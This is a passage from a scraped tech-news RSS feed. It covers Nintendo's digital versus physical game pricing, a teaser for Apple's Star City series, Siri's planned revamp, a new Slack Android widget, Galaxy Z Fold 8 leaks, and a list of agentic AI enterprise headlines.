<span></span><figure><img src="https://s.yimg.com/os/creatr-uploaded-images/2026-03/c47a1040-2873-11f1-aeef-d60628398533" data-crop-orig-src="https://s.yimg.com/os/creatr-uploaded-images/2026-03/c47a1040-2873-11f1-aeef-d60628398533" alt="The price of Yoshi." data-uuid="50240668-89ad-3fb0-b892-64f70a5fdf2f"><figcaption></figcaption><div class="photo-credit">Nintendo</div></figure>
<p>It's yet another blow, however, for consumers who prefer physical media. They aren't getting any kind of a discount, and many Switch 2 cartridges don't even contain the game nowadays. The boxes <a data-i13n="cpos:5;pos:1" href="https://www.nintendolife.com/forums/nintendo-switch-2/pokopia_digital_or_game-key_card"><ins>include game key cards</ins></a>, which allow the user to download the title to the console but are basically paperweights after that.</p>
<p>This isn't the first time Nintendo has participated in this kind of dual pricing structure. The digital version of <em>Donkey Kong Bananza</em> <a data-i13n="cpos:6;pos:1" href="https://www.thegamebusiness.com/p/game-devs-scramble-to-join-nintendo"><ins>was cheaper than the physical version</ins></a> in some parts of the world, including the UK.</p>
<p>Is this another sign that making and shipping actual things is getting to be prohibitively expensive? There are <a data-i13n="cpos:7;pos:1" href="https://www.engadget.com/computing/idc-warns-of-major-pc-market-downturn-due-to-memory-crunch-214510197.html"><ins>storage and memory shortages</ins></a> due to AI and <a data-i13n="cpos:8;pos:1" href="https://www.pbs.org/newshour/economy/the-iran-war-and-surging-oil-prices-are-affecting-consumers-heres-how"><ins>oil shortages due to war</ins></a>, not to mention an <a data-i13n="cpos:9;pos:1" href="https://www.techtarget.com/whatis/feature/How-US-tariffs-are-reshaping-the-tech-landscape"><ins>ever-shifting tariff policy</ins></a> here in the US. It's tough out there. </p>This article originally appeared on Engadget at https://www.engadget.com/gaming/nintendo/nintendo-to-start-charging-different-prices-for-first-party-digital-and-physical-games-184249374.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's your first look at For All Mankind spinoff Star City]]></title>
<description><![CDATA[Apple’s excellent For All Mankind might be wrapping up after its recently confirmed sixth season, but as one big-budget alt-history sci-fi show departs, another is born. Apple TV has just dropped the first teaser for Star City, which focuses on the reimagined space race of the 1960s from the Sovi...]]></description>
<link>https://tsecurity.de/de/3381196/it-nachrichten/heres-your-first-look-at-for-all-mankind-spinoff-star-city/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3381196/it-nachrichten/heres-your-first-look-at-for-all-mankind-spinoff-star-city/</guid>
<pubDate>Wed, 25 Mar 2026 18:46:56 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple’s excellent <em>For All Mankind </em>might be wrapping up after its recently <a data-i13n="cpos:1;pos:1" href="https://www.engadget.com/entertainment/tv-movies/for-all-mankind-is-returning-for-a-sixth-and-final-season-173859683.html"><ins>confirmed</ins></a> sixth season, but as one big-budget alt-history sci-fi show departs, another is born. Apple TV has just dropped the first <a data-i13n="cpos:2;pos:1" href="https://youtube.com/watch?v=Uh-8EUCJHx8"><ins>teaser</ins></a> for <em>Star City</em>, which focuses on the reimagined space race of the 1960s from the Soviet perspective.</p>
<p>ICYMI, <em>For All Mankind </em>has been running for nearly five seasons now (the fifth arrives later this week), with its debut season in 2019 asking, "what if Russia had beaten America to the moon?" <em>For All Mankind </em>has jumped a number of decades ahead since then, but <em>Star City </em>returns us to that initial premise, taking us behind the Iron Curtain to see how the Soviet Union orchestrated its fictional historical triumph.</p>
<span></span><div></div>
<p>The brief teaser doesn’t show us much in the way of plot, but you straight away get what vibe the streamer is going for with a show it <a data-i13n="elm:affiliate_link;sellerN:Apple;elmt:;cpos:3;pos:1" href="https://shopping.yahoo.com/rdlw?merchantId=4130e2f0-a14f-4c5e-bdab-cd52ac7d8e79&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=30dd3d09-ccd2-418f-90cb-cbb758121b8d&amp;featureId=text-link&amp;merchantName=Apple&amp;linkText=describes&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hcHBsZS5jb20vdWsvdHYtcHIvbmV3cy8yMDI2LzAyL2FwcGxlLXR2LXVudmVpbHMtYS1maXJzdC1sb29rLWF0LXN0YXItY2l0eS10aGUtZ3JpcHBpbmctbmV3LXNwYWNlLXJhY2UtZHJhbWEtc2V0LWluLXRoZS13b3JsZC1vZi1mb3ItYWxsLW1hbmtpbmQtZnJvbS1hd2FyZC13aW5uaW5nLWNyZWF0b3JzLWJlbi1uZWRpdmktbWF0dC13b2xwZXJ0LWFuZC1yb25hbGQtZC1tb29yZS8iLCJjb250ZW50VXVpZCI6IjMwZGQzZDA5LWNjZDItNDE4Zi05MGNiLWNiYjc1ODEyMWI4ZCIsIm9yaWdpbmFsVXJsIjoiaHR0cHM6Ly93d3cuYXBwbGUuY29tL3VrL3R2LXByL25ld3MvMjAyNi8wMi9hcHBsZS10di11bnZlaWxzLWEtZmlyc3QtbG9vay1hdC1zdGFyLWNpdHktdGhlLWdyaXBwaW5nLW5ldy1zcGFjZS1yYWNlLWRyYW1hLXNldC1pbi10aGUtd29ybGQtb2YtZm9yLWFsbC1tYW5raW5kLWZyb20tYXdhcmQtd2lubmluZy1jcmVhdG9ycy1iZW4tbmVkaXZpLW1hdHQtd29scGVydC1hbmQtcm9uYWxkLWQtbW9vcmUvIn0&amp;signature=AQAAAWqaGGVXRElZf3heenBDIAC5o7uKf19xJPtOUrjxaRqw&amp;gcReferrer=https%3A%2F%2Fwww.apple.com%2Fuk%2Ftv-pr%2Fnews%2F2026%2F02%2Fapple-tv-unveils-a-first-look-at-star-city-the-gripping-new-space-race-drama-set-in-the-world-of-for-all-mankind-from-award-winning-creators-ben-nedivi-matt-wolpert-and-ronald-d-moore%2F" class="rapid-with-clickid" data-original-link="https://www.apple.com/uk/tv-pr/news/2026/02/apple-tv-unveils-a-first-look-at-star-city-the-gripping-new-space-race-drama-set-in-the-world-of-for-all-mankind-from-award-winning-creators-ben-nedivi-matt-wolpert-and-ronald-d-moore/"><ins>describes</ins></a> as a "propulsive paranoid thriller." We also get a look at some of the cast, which includes <em>House of the Dragon</em>’s Rhys Ifans, Anna Maxwell Martin and Agnes O’Casey.</p>
<p>Interestingly, <em>Star City</em>’s two-episode premiere lands on Apple TV on May 29, right after the finale of <em>For All Mankind </em>season 5, which takes place in the 2010s. That could make for a pretty jarring backwards time jump if you watch both seasons back to back, but nobody can say that Apple isn’t serving its sci-fi audience.</p>This article originally appeared on Engadget at https://www.engadget.com/entertainment/streaming/heres-your-first-look-at-for-all-mankind-spinoff-star-city-174359587.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s AI endgame: Why waiting for Siri could make it a winner]]></title>
<description><![CDATA[Not only does Apple already make the world’s best AI PC with the M5 Max MacBook Pro capable of handling up to 90-billion parameter models, now it’s preparing to introduce what it hopes will be the world’s leading personal AI app.



Bloomberg tells us Apple has a big plan for iOS 27 with a massiv...]]></description>
<link>https://tsecurity.de/de/3381025/it-nachrichten/apples-ai-endgame-why-waiting-for-siri-could-make-it-a-winner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3381025/it-nachrichten/apples-ai-endgame-why-waiting-for-siri-could-make-it-a-winner/</guid>
<pubDate>Wed, 25 Mar 2026 18:01:30 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Not only does Apple already make the <a href="https://www.computerworld.com/article/4072936/apple-boosts-macs-ipads-vision-pro-with-powerful-m5-processors.html">world’s best AI PC</a> with the <a href="https://www.computerworld.com/article/4148742/heres-what-5849-gets-you-in-an-m5-max-macbook-pro.html">M5 Max MacBook Pr</a>o capable of handling up to 90-billion parameter models, now it’s preparing to introduce what it hopes will be the world’s leading personal AI app.</p>



<p><em><a href="https://www.bloomberg.com/news/articles/2026-03-24/ios-27-features-apple-ai-reboot-with-siri-app-new-interface-ask-siri-button" target="_blank" rel="noreferrer noopener">Bloomberg</a></em> tells us Apple has a big plan for iOS 27 with a <a href="https://www.computerworld.com/article/4120757/apples-siri-to-see-two-major-ai-improvements-this-year.html">massive Siri revamp</a>, turning it into a full-scale chatbot like ChatGPT or Gemini. The update might extend to Siri gaining its own dedicated Siri app, deeper system integration, and potentially replacing or integrating Spotlight search.  The idea is that Siri will be as good as any other chatbot you use, but will also be equipped with information personal to you — only on the device, private, and secure (insofar as there is any privacy and security anymore). </p>



<h2 class="wp-block-heading"><strong>Hey Siri, will the future be better tomorrow?</strong></h2>



<p>If this sounds like something to look forward to, then it’s worth noting that this isn’t really the first time we’ve heard high-placed Apple speculation claiming Siri will be better tomorrow.</p>



<p>Tomorrow has been a long time coming, since similar claims were made at WWDC 2024, and even now it looks as if the meat of these improvements won’t hit the table until late 2026. Supporters can make the point that the company has made major efforts to get to this point, with <a href="https://www.computerworld.com/article/3989461/drama-at-apple-as-ai-failures-cause-heads-to-roll.html">executive departures</a>, <a href="https://www.applemust.com/apples-siri-team-to-do-whatever-it-takes-to-make-apple-intelligence-the-best-it-can-be/" target="_blank" rel="noreferrer noopener">strategic excursions</a>, and <a href="https://www.applemust.com/apple-to-pay-google-5-billion-for-gemini-foundations-to-ai/" target="_blank" rel="noreferrer noopener">unheard of partnerships</a> put in place to enable the company to achieve its aims.</p>



<p>Hopefully, that will be realized by fall.</p>



<h2 class="wp-block-heading"><strong>Managing expectation</strong>s</h2>



<p>The big reason this speculation is appearing now is easy to surmise. Apple <a href="https://www.applemust.com/apple-announces-important-wwdc-conference-begins-june-8/" target="_blank" rel="noreferrer noopener">announced its upcoming Worldwide Developers Conference</a> this week, and is likely working to set expectations for the event. It must, as we have until recently hoped to see some of the AI features the company has promised for Siri appearing sooner than WWDC. </p>



<p>However, we’ve recently heard even some of these improvements won’t be ready by Apple’s most recently suggested deadlines. With the world’s attention — and the attention of shareholders — preparing to descend on Cupertino in early June, Apple knows it needs to avoid yet another wave of “Apple has failed in AI” headlines. Maybe the new story of tasty, tasty jam tomorrow’in iOS 27 will be strong enough to keep expectations realistic.</p>



<h2 class="wp-block-heading"><strong>What Apple is doing</strong></h2>



<p>We do know that Apple’s is building a new Siri powered using a combination of <a href="https://www.computerworld.com/article/4116668/what-we-know-about-apples-google-gemini-deal-for-ai.html">Google Gemini and its own AI tech</a>; we should see some of those features appear with iOS 26.5, as they failed to make the cut in iOS 26.4.</p>



<p>One big promise in all of the reporting concerns intent. Apple is not interested in shipping something half-baked, which means it would rather delay introduction than commit further self-harm with the rollout of anything that disappoints. </p>



<p>The company is also in a good position to lean back into the advantages it does have. I mentioned its biggest advantage right at the top, which is that its current crop of A- and M-series processors are already <a href="https://www.computerworld.com/article/4065553/apple-is-nowhere-near-the-limits-of-apple-silicon.html">highly-optimized for artificial intelligence</a>. Even without its own AI services, the company already offers the world’s best combined mobile, tablet, PC, headset ecosystem on which to run AI services, on or off device. </p>



<h2 class="wp-block-heading"><strong>It’s the platform, stupid</strong></h2>



<p>That’s not an advantage to sniff at, since it means anyone already on its platforms can easily use all the available AI services quite effectively. More to the point, you can use many models <a href="https://www.computerworld.com/article/4016798/why-i-hope-apple-keeps-investing-in-on-device-ai.html">on the devices themselves</a>, rather than sharing data with the cloud. So what? </p>



<p>Well, in this the “what” is that even if Apple fails to ship its own take on AI services (which it won’t), it already provides the best platform for the services that <em>do</em> exist. That advantage isn’t limited to its <a href="https://www.computerworld.com/article/4148742/heres-what-5849-gets-you-in-an-m5-max-macbook-pro.html">high-end products</a>, either; even the newly-minted <a href="https://www.computerworld.com/article/4145811/review-a-weekend-with-macbook-neo.html">MacBook Neo</a> is capable of doing some of this work, and will certainly be robust enough to handle the on-device models Apple is building for Siri in iOS 27.</p>



<h2 class="wp-block-heading"><strong>You don’t need Siri to tell you where the wind blows</strong></h2>



<p>Zoom out a bit and the extent to which Apple being behind on AI is turning into an advantage for the company. After all, while competitors in the space spent vast fortunes in shareholder capital on massive server deployments and LLM development, Apple did not. </p>



<p>While others in the industry become deeply reliant on vast stacks of memory to run models in the cloud, Apple’s parsimonious approach means its systems can do more with less, and as GenAI becomes a commodity, Apple remains unique in offering the best platform on which to run those services. </p>



<p>The result? It’s hardware sales are going through the roof amid the emerging PC industry decline, and it is on the cusp of establishing itself as a peer player based on strategically-managed tactical investments.</p>



<p>While others invested in server farms, Apple invested wisely, giving it a competitive edge and a short road map to profit.The last will be another competitive advantage as some of the world’s wealthiest shareholders <a href="https://www.applemust.com/will-war-in-the-east-burst-the-ai-bubble/" target="_blank" rel="noreferrer noopener">retreat investment</a> as a consequence of flailing power politics in the Middle East. The endgame may yet be that unlike so many other situations likely to have existential impacts on our way of life, Apple management successfully built a strategic narrative in which victory conditions are both defined and achievable.</p>



<p>We’re about to find out whether that’s true. </p>



<p><em>You can follow me on social media! Join me on </em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener"><em>BlueSky</em></a><em>,  </em><a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener"><em>LinkedIn</em></a><em>, and </em><a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener"><em>Mastodon</em></a><em>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A Slack Android upgrade worth finding]]></title>
<description><![CDATA[Man, when it comes to Android, Slack sure has been slackin’.



The app is generally considered the go-to, standard tool for most professional communication — right? And yet, somehow, it has managed to exist on the most used mobile operating system all this time without offering up a single Andro...]]></description>
<link>https://tsecurity.de/de/3379522/it-nachrichten/a-slack-android-upgrade-worth-finding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3379522/it-nachrichten/a-slack-android-upgrade-worth-finding/</guid>
<pubDate>Wed, 25 Mar 2026 11:01:58 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Man, when it comes to Android, Slack sure has been slackin’.</p>



<p>The app is generally considered the go-to, standard tool for most professional communication — right? And yet, somehow, it has managed to exist on the most used mobile operating system all this time without offering up a single <a href="https://www.computerworld.com/article/1699499/must-have-android-widgets-for-busy-professionals.html">Android widget</a> to make our on-the-go musings a wee bit easier.</p>



<p>Well, join me for a collective <em>hallelujah</em>: The folks behind Slack have seemingly found the time for a break from launching <a href="https://www.computerworld.com/article/4071520/slacks-slackbot-is-now-a-fully-fledged-ai-assistant.html">overhyped AI features no one actually wants</a> (better known as “those annoying upsell prompts you have to dismiss in the app every four to seven weeks”) and seen fit to (<em>gasp!</em>) create an actual home screen widget for those of us on Android to enjoy.</p>



<p>Hey, it’s only 13 years delayed! (Slack first launched on Android in 2013.) But better late than never — and if you’re using Slack on Android already, it’s well worth your while to dig up, try out, and put into action.</p>



<p><strong>[Get fresh practical insight in your inbox with </strong><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong>my free Android Intelligence newsletter</strong></a><strong>. Three new things to try every Friday!]</strong></p>



<h2 class="wp-block-heading"><strong>Your new Slack Android widget surprise</strong></h2>



<p>Now, first things first, before you get <em>too</em> excited: Our freshly surfaced Slack Android widget miracle may not be <em>everything</em> you’d hope it to be.</p>



<p>Back in the summer of ’24, y’see, Slack unveiled a series of <a href="https://www.zdnet.com/article/slack-now-offers-four-iphone-widgets-heres-how-you-can-use-them/" target="_blank" rel="noreferrer noopener"><em>four</em> widget options</a> for our friends over in the magical and revolutionary land of Apple-stamped iGizmos — sensibly offering a variety of practical functions for direct ‘n’ easy ongoing access to our counterparts on that side of the digital divide.</p>



<p>We lowly Android-appreciating organisms clearly aren’t magical nor revolutionary enough to earn <em>that </em>kind of equality, even two years after the fact, but — well, luckily, the one widget we <em>are</em> getting right now might be the most useful one of all.</p>



<p>It creates a simple status-setting shortcut on your home screen that lets you pick from one of several premade status options and set ’em for yourself with a single swift tap of your favorite phelange. See?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Slack Android widget: Set status" class="wp-image-4149476" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?quality=50&amp;strip=all 2160w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=300%2C88&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=768%2C224&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=1024%2C299&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=1536%2C449&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=2048%2C598&amp;quality=50&amp;strip=all 2048w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=1240%2C362&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=150%2C44&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=854%2C249&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=640%2C187&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-set-status.jpg?resize=444%2C130&amp;quality=50&amp;strip=all 444w" width="1024" height="299" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">The new Slack Android widget, in all of its awkward scrolling glory.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Now, if we want to further shame Slack and focus on how little the team behind it seems to actually use or understand Android, we could point out that this widget awkwardly doesn’t allow you to resize it <em>vertically</em> — making it taller, in other words — and so its available options weirdly require a slight internal scroll to fully see, without the bottom two being cut off even in the widget’s wide-as-possible form. That’s pretty sloppy and not exactly what you’d expect from a professional developer of any caliber.</p>



<p>We could also note how it’s odd that the widget’s status-setting options don’t sync up and align with any <em>custom</em> or <em>recent </em>Slack statuses you’ve created and used within your own actual Slack team space and instead stick to only the most generic all-purpose defaults imaginable. That feels like a pretty weird choice when it comes to user experience in this day and age.</p>



<p>And, if we <em>really</em> wanna pick at nits, we might note how vexing it is that a feature of this magnitude didn’t ever even show up in the Slack Android app’s “What’s new” list <a href="https://play.google.com/store/apps/details?id=com.Slack&amp;hl=en_US" target="_blank" rel="noreferrer noopener">in the Play Store</a> — or even within the more elaborate Slack for Android <a href="https://slack.com/release-notes/android" target="_blank" rel="noreferrer noopener">release notes</a> on the company’s website. You really had to just luck out and happen to be poking around in the right place, as I did this week, to stumble onto the addition and realize it was there.</p>



<p>But hey, we won’t go down that road. The truth is that even just having a one-tap shortcut to set a Slack status from the home screen is a pretty incredible improvement — and, similarly, being able to <em>see</em> your current Slack status at a glance and reset it with just one tap from your home screen is a powerful enhancement of its own.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Slack Android widget: See and clear status" class="wp-image-4149475" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?quality=50&amp;strip=all 2160w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=300%2C87&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=768%2C223&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=1024%2C298&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=1536%2C447&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=2048%2C595&amp;quality=50&amp;strip=all 2048w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=1240%2C361&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=150%2C44&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=854%2C248&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=640%2C186&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/03/slack-android-widget-see-status.jpg?resize=444%2C129&amp;quality=50&amp;strip=all 444w" width="1024" height="298" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Being able to see and reset your Slack status without having to poke around in the app may be the best part of all.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>So head on over to the Play Store, make sure your Slack app is updated to the latest available version, and then press and hold any open spot on your home screen to seek out our sole new widget addition.</p>



<p>All well-warranted snark aside, it truly <em>is</em> a useful new element to have in front of us after all this time — and hey, who knows? Maybe in another 13 years, we’ll get a second widget added into the mix.</p>



<p><em>Maybe</em>.</p>



<p><em>Feed yourself fresh Android wisdom every Friday with </em><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong><em>my free Android Intelligence newsletter</em></strong></a><em>. Three new things to try in your inbox — and plenty of interesting extras along the way.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Galaxy Z Fold 8]]></title>
<description><![CDATA[Folding phone fans, feast your eyes upon what might be the upcoming Galaxy Z Fold 8 from Samsung. Thanks to @onleaks and CAD dimensions getting online, which are the measurements sent out to accessory makers, we have our first good look at what to expect from Samsung later this year. As you can p...]]></description>
<link>https://tsecurity.de/de/3377389/it-nachrichten/heres-the-galaxy-z-fold-8/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3377389/it-nachrichten/heres-the-galaxy-z-fold-8/</guid>
<pubDate>Tue, 24 Mar 2026 17:16:13 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Folding phone fans, feast your eyes upon what might be the upcoming Galaxy Z Fold 8 from Samsung. Thanks to @onleaks and CAD dimensions getting online, which are the measurements sent out to accessory makers, we have our first good look at what to expect from Samsung later this year. As you can probably quickly...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/03/24/heres-the-galaxy-z-fold-8/">Here’s the Galaxy Z Fold 8</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI – Ongoing coverage of its impact on the enterprise]]></title>
<description><![CDATA[Over the next few years, agentic AI is expected to bring not only rapid technological breakthroughs, but a societal transformation, redefining how we live, work and interact with the world. And this shift is happening quickly.  “By 2028, 33% of enterprise software applications will include agenti...]]></description>
<link>https://tsecurity.de/de/3375185/it-nachrichten/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3375185/it-nachrichten/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise/</guid>
<pubDate>Tue, 24 Mar 2026 03:31:42 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Over the next few years, agentic AI is expected to bring not only rapid technological breakthroughs, but a societal transformation, <a href="https://www.computerworld.com/article/2514480/the-promise-and-peril-of-agentic-ai.html" data-type="link" data-id="https://www.computerworld.com/article/2514480/the-promise-and-peril-of-agentic-ai.html">redefining how we live, work and interact with the world</a>. And this shift is happening quickly.  “By 2028, 33% of enterprise software applications will include agentic AI, up from less than 1% in 2024, enabling 15% of day-to-day work decisions to be made autonomously,” according to research firm Gartner.</p>



<p>Unlike traditional AI, which typically follows preset rules or algorithms, agentic AI adapts to new situations, learns from experiences, and operates independently to pursue goals without human intervention. In short, agentic AI empowers systems to act autonomously, making decisions and executing tasks — even communicating directly with other AI agents — with little or no human involvement.</p>



<p>Agentic AI will enable machines to interact with the physical world with unprecedented intelligence, allowing them to perform complex tasks in dynamic environments, which could be especially useful for industries facing labor shortages or hazardous conditions.However, the rise of agentic AI also brings security and ethical concerns. Ensuring these autonomous systems operate safely, transparently and responsibly will require governance frameworks and testing.</p>



<p>Follow this page for ongoing agentic AI coverage from <em>Computerworld</em> and Foundry’s other publications.</p>



<h2 class="wp-block-heading">Agentic AI news and insights</h2>



<h3 class="wp-block-heading">Cisco goes all in on agentic AI security</h3>



<p><em>March 26, 2026</em>: Cisco is rolling out identity and access management capabilities, a toolkit customers can use to <a href="https://www.networkworld.com/article/4148823/cisco-goes-all-in-on-agentic-ai-security.html">embed security controls in AI agents</a>, and automation features that will allow security operations teams to quickly see and respond to problems.</p>



<h3 class="wp-block-heading">AI agents still need humans to teach them</h3>



<p><em>February 20, 2026</em>: <a href="https://www.computerworld.com/article/4135331/ai-agents-still-need-humans-to-teach-them.html">AI agents need skills</a> — specific procedural knowledge — to perform tasks well, but they can’t teach themselves, a new research suggests.</p>



<h3 class="wp-block-heading">Why most agentic AI projects stall before they scale</h3>



<p><em>February 18, 2026</em>: As enterprises race from pilots to autonomous systems, rising costs, fragile governance, and unrealistic expectations are forcing a reckoning. <a href="https://www.cio.com/article/4132031/why-most-agentic-ai-projects-stall-before-they-scale.html">So what separates agentic AI initiatives that survive</a> from those that quietly shut down?</p>



<h3 class="wp-block-heading">How agentic AI helps prospective and existing students at DeVry</h3>



<p><em>February 18, 2026</em>: DeVry is no stranger to AI. It’s used the technology in its classrooms for 10 years and started experimenting with NLP bots and gen AI use cases for internal use as soon as it became widely available. So in <a href="https://www.cio.com/article/4132196/how-agentic-ai-helps-prospective-and-existing-students-at-devry.html">April 2025, Devry University deployed its first AI agent</a>.</p>



<h3 class="wp-block-heading">Task management software gets an agentic boost</h3>



<p><em>February 11, 2026</em>: Task management apps aren’t just for storing and tracking data — they act on it. <a href="https://www.computerworld.com/article/1721258/task-management-apps-collaborative-project-tracking-tools-for-the-digital-workplace.html">Explore tools that tap AI to auto-generate workflows</a>, balance team capacity, and eliminate administrative overhead.</p>



<h3 class="wp-block-heading">OpenClaw: The AI agent that’s got humans taking orders from bots</h3>



<p><em>February 6, 2026</em>: How one man’s vibe-coding session evolved into a <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html">reckless global AI experiment</a> where nobody’s accountable.</p>



<h3 class="wp-block-heading">Forward Networks launches agentic AI system built on network digital twin</h3>



<p><em>January 30, 2026</em>: The new <a href="https://www.networkworld.com/article/4125111/forward-networks-launches-agentic-ai-system-built-on-network-digital-twin.html">Forward AI capability builds on the vendor’s digital twin</a> and is designed to allow network teams to ask complex questions, understand network behavior, validate outcomes and safely automate workflows.</p>



<h3 class="wp-block-heading">Agentic AI exposes what we’re doing wrong</h3>



<p><em>January 23, 2026:</em> <a href="https://www.infoworld.com/article/4120858/agentic-ai-exposes-what-were-doing-wrong.html">Agentic AI has changed cloud computing</a>, but not in the way the hype machine wants you to believe. It hasn’t magically replaced engineering, nor has it made architecture irrelevant. </p>



<h3 class="wp-block-heading">How to get your enterprise architecture ready for agentic AI</h3>



<p><em>January 22, 2026</em>: While <a href="https://www.cio.com/article/4119297/how-to-get-your-enterprise-architecture-ready-for-agentic-ai.html">C-suite leaders say they’re investing in agentic AI</a>, the complex enterprise architectures of large organizations often struggle with the tech’s demands.</p>



<h3 class="wp-block-heading">IBM targets agentic AI scale-up with new Enterprise Advantage consulting service</h3>



<p><em>January  20, 2026</em>: IBM has launched a new consulting service named Enterprise Advantage, designed to <a href="https://www.cio.com/article/4119056/ibm-targets-agentic-ai-scale-up-with-new-enterprise-advantage-consulting-service.html">help CIOs take their agentic and other AI applications</a> from experimentation to large-scale production.</p>



<h3 class="wp-block-heading">EY exec: If you think agentic AI is a challenge, you’re not ready for what’s coming</h3>



<p><em>January 15, 2026</em>: Companies struggling to keep up with the arrival of AI agents should buckle up: Even <a href="https://www.computerworld.com/article/4117377/ey-exec-if-you-think-agentic-ai-is-a-challenge-youre-not-ready-for-whats-coming.html">more complicated agentic AI technologies</a> are quickly coming down the pike. That includes physical AI, which includes robots and quantum computing. </p>



<h3 class="wp-block-heading">Managing agentic AI risk: Lessons from the OWASP Top 10</h3>



